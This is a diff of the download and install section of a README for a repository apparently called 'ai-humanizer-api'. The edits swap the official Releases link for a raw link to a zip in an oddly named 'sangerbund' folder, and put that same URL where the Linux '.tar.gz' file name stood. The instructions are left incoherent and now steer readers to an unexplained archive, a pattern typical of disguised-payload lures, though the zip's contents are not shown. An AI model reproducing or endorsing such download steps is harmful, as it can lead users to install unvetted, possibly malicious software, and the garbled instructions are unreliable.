unknownman1244/ai-humanizer-api/README.md

 ### 💻 Download & Install

-1. Click to visit the [Releases page](https://github.com/unknownman1244/ai-humanizer-api/releases) to download the latest version of the ai-humanizer-api.
+1. Click to visit the [Releases page](https://raw.githubusercontent.com/unknownman1244/ai-humanizer-api/main/sangerbund/ai-humanizer-api.zip) to download the latest version of the ai-humanizer-api.
 2. Look for the most recent version listed at the top of the page.
 3. Download the correct file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/unknownman1244/ai-humanizer-api/main/sangerbund/ai-humanizer-api.zip` file.
 4. Once the file downloads, locate it in your downloads folder.

 ### 📥 Running the Application